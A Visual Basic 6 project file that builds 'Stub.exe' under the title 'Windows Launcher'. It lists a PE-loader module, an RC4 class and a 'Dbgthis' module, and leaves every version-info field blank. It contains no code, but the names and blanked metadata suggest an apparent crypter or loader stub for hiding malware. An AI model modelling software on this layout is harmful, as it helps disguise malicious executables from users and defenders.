Type=Exe
Module=mPEL; mPEL.bas
Module=mMain; mMain.bas
Module=Dbgthis; Dbgthis.bas
Form=ASDx.frm
Class=C4; clsRC4.cls
IconForm="ASDx"
Startup="Sub Main"
HelpFile=""
Title="Windows Launcher"
ExeName32="Stub.exe"
Path32=".."
Command32=""
Name="K5"
HelpContextID="0"
CompatibleMode="0"
MajorVer=2
MinorVer=11
RevisionVer=2
AutoIncrementVer=0
ServerSupportFiles=0
VersionComments="           "
VersionCompanyName="               "
VersionFileDescription="           "
VersionLegalCopyright="     "
VersionLegalTrademarks="    "
VersionProductName="   "
CompilationType=-1
OptimizationType=1
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=-1
BoundsCheck=-1
OverflowCheck=-1
FlPointCheck=-1
FDIVCheck=-1
UnroundedFP=-1
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1
DebugStartupOption=0

[MS Transaction Server]
AutoRefresh=1
